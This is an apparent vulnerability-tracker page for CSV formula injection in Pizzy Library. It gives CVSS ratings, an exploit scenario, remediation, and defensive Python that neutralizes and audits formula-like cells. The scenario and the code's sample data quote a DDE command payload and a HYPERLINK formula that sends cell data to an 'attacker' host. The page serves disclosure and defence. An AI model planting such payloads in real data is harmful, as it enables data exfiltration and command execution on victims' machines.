Severity by source
CVSS 3.1 vector (vendor): AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Authenticated input injection (PR:L) over the network; exploitation requires the victim to open the CSV (UI:R), and the impact lands on the spreadsheet host rather than on Pizzy (S:C), with full CIA impact.
Primary rating from vendor (TR-CERT).
CVSS vector (NVD): CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Description (NVD)
Improper neutralization of formula elements in a CSV file vulnerability in MIA Technology Inc. Pizzy Library allows Code Injection.
This issue affects Pizzy Library: from 1.0.0.26250 before 1.3.9.26250.
Analysis (AI-generated)
CSV formula injection in MIA Technology's Pizzy Library (versions 1.0.0.26250 through 1.3.9.26250) allows authenticated attackers to inject formula elements into generated CSV files, leading to code execution when the file is opened in a spreadsheet application. The flaw is rated CVSS 8.8 and was reported by TR-CERT; no public exploit had been identified at the time of analysis. …
Vulnerability Assessment (AI-generated)

| Aspect | Assessment |
|---|---|
| Exploitation | Requires (1) authenticated write access to a field that Pizzy Library subsequently serializes into a CSV export, consistent with CVSS PR:L; (2) a victim who downloads the generated CSV and opens it in a spreadsheet application (Excel, Calc, Sheets) that evaluates formulas, so despite UI:N in the vector, CWE-1236 exploitation is gated on this victim action; and (3) the spreadsheet client either auto-enabling formulas/DDE or the user clicking through the protected-view warning. … |
| Risk Assessment | The CVSS 3.1 vector AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H rates this 8.8 (High), but the vector is internally inconsistent with a classic CSV injection: real exploitation of CWE-1236 requires the victim to open the exported file in a spreadsheet client, which would normally warrant UI:R, and the impact lands on the downstream viewer rather than the Pizzy host, which suggests a scope change. … |
| Exploit Scenario | An authenticated low-privilege user of an application that embeds Pizzy Library submits a field value such as `=cmd\|'/c calc'!A1` or `=HYPERLINK("http://attacker/?"&A1,"Click")` into a record that will later be exported. A finance or admin user downloads the resulting CSV and opens it in Excel, at which point the formula executes, leaking row data over HTTP or invoking DDE to run an arbitrary command in the victim's session. |
| Remediation | Upgrade Pizzy Library to version 1.3.9.26250 or later, the first fixed release per the affected-range metadata; consult the TR-CERT bulletin at https://siberguvenlik.gov.tr/guvenlik-bildirimleri/detay/tr-26-0383 for vendor coordination details. … |
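The Remediation row covers the upgrade; the underlying defence for any application that serializes user-controlled fields into CSV is to neutralize formula triggers at export time (the CWE-1236 fix) and to audit exports it has already produced. The following Python is an added example written for this page, not code from Pizzy Library, MIA Technology or vuln.today. The function names `is_formula_like`, `neutralize_cell`, `export_csv` and `audit_csv` are chosen here, `SAMPLE_RECORDS` is constructed data that reuses the two payload shapes quoted in the exploit scenario above, and the choice to treat a trigger character that follows leading spaces as dangerous is a conservative assumption of this example.

```python
import csv
import io

# Leading characters that Excel, LibreOffice Calc and Google Sheets treat as
# the start of a formula or a DDE/link trigger (the OWASP CSV-injection list).
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")


def is_formula_like(value: str) -> bool:
    """True if a spreadsheet client would evaluate this cell instead of showing it.

    Leading spaces are removed before the check (assumption: some clients ignore
    them), so "  =1+1" counts as formula-like. A plain signed number such as
    "-15" or "+3.5" is parsed as a number, not a formula, and is not flagged.
    """
    stripped = value.lstrip(" ")
    if not stripped.startswith(FORMULA_TRIGGERS):
        return False
    try:
        float(stripped)
        return False
    except ValueError:
        return True


def neutralize_cell(value) -> str:
    """Render one cell so that it is always displayed as text.

    Numbers pass through unchanged (a typed int/float cannot be a formula).
    A formula-like string gets a leading apostrophe, which spreadsheet clients
    interpret as "this is text"; the csv writer then quotes every field so an
    embedded separator or quote cannot break the row structure either.
    """
    if isinstance(value, (int, float)):
        return str(value)
    text = "" if value is None else str(value)
    if is_formula_like(text):
        return "'" + text
    return text


def export_csv(rows, header=None) -> str:
    """Serialize rows to CSV text with every cell neutralized and every field quoted."""
    buf = io.StringIO()
    writer = csv.writer(buf, quoting=csv.QUOTE_ALL, lineterminator="\r\n")
    if header:
        writer.writerow(header)
    for row in rows:
        writer.writerow([neutralize_cell(cell) for cell in row])
    return buf.getvalue()


def audit_csv(text: str):
    """Scan an existing CSV export and list the cells a spreadsheet would evaluate.

    Returns (row_index, col_index, cell) tuples; an empty list means the export
    contains no formula-like cells.
    """
    findings = []
    for r, row in enumerate(csv.reader(io.StringIO(text))):
        for c, cell in enumerate(row):
            if is_formula_like(cell):
                findings.append((r, c, cell))
    return findings


# Constructed sample records: benign values plus the payload shapes quoted in
# the exploit scenario, and a phone number that starts with "+" after spaces.
SAMPLE_RECORDS = [
    ("alice", "Paid invoice", 120.5),
    ("bob", "=cmd|'/c calc'!A1", -15),
    ("carol", '=HYPERLINK("http://attacker/?"&A1,"Click")', 0),
    ("dave", "  +1 (555) 0100", 3),
]

if __name__ == "__main__":
    safe = export_csv(SAMPLE_RECORDS, header=("user", "note", "amount"))
    print(safe)
    print("formula-like cells after neutralization:", audit_csv(safe))
```

Running the block prints the hardened export and an empty findings list. The trade-off to be aware of is that the apostrophe turns a free-text field like "+1 (555) 0100" into a text cell, which is the intended behaviour for anything that is not a typed number; `audit_csv` is the check to run over CSV files that were generated before the fix was in place.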
Recommended Action (AI-generated)
Within 24 hours: identify all systems and applications using Pizzy Library versions 1.0.0.26250-1.3.9.26250; publish a security advisory cautioning users against opening CSV files from untrusted sources. …
External POC / Exploit Code
EUVD-2026-36719
GHSA-qv7c-w6cp-c775